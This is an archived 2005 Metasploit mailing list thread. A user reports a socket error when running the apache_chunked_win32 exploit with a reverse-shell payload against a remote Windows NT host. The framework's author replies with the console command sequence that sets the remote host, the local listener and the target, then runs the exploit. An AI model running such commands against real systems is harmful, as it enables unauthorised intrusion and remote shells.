
Metasploit mailing list archives
Exploiting Apache : Errors
From: hdm at metasploit.com (H D Moore)
Date: Tue, 26 Apr 2005 13:35:46 -0500
That is not how the Framework works, the exploit command does not take any arguments, parameters are passed via the environment: msf> show options msf> set RHOST 80.x.x.x msf> set RPORT 80 msf> set LHOST 1.2.3.4 msf> set LPORT 8775 msf> show targets msf> set TARGET 0 msf> exploit http://metasploit.com/projects/Framework/docs/userguide.pdf -HD On Tuesday 26 April 2005 13:28, Cyril Esedo wrote:
Hi All, Each time i try running the apache_chunked_win32 exploit on a remote Win NT box (with all other metasploit options set), i get the following msg: msf apache_chunked_win32(win32_reverse) > exploit 80.x.x.x [*] Starting Reverse Handler. [*] Error creating socket: Connection failed: Operation now in progress [*] Exiting Reverse Handler. msf apache_chunked_win32(win32_reverse) > Can anyone point me to the solution? thanks - C
Current thread:
- Exploiting Apache : Errors Cyril Esedo (Apr 26)
- Exploiting Apache : Errors H D Moore (Apr 26)
- <Possible follow-ups>
- Exploiting Apache : Errors Cyril Esedo (Apr 27)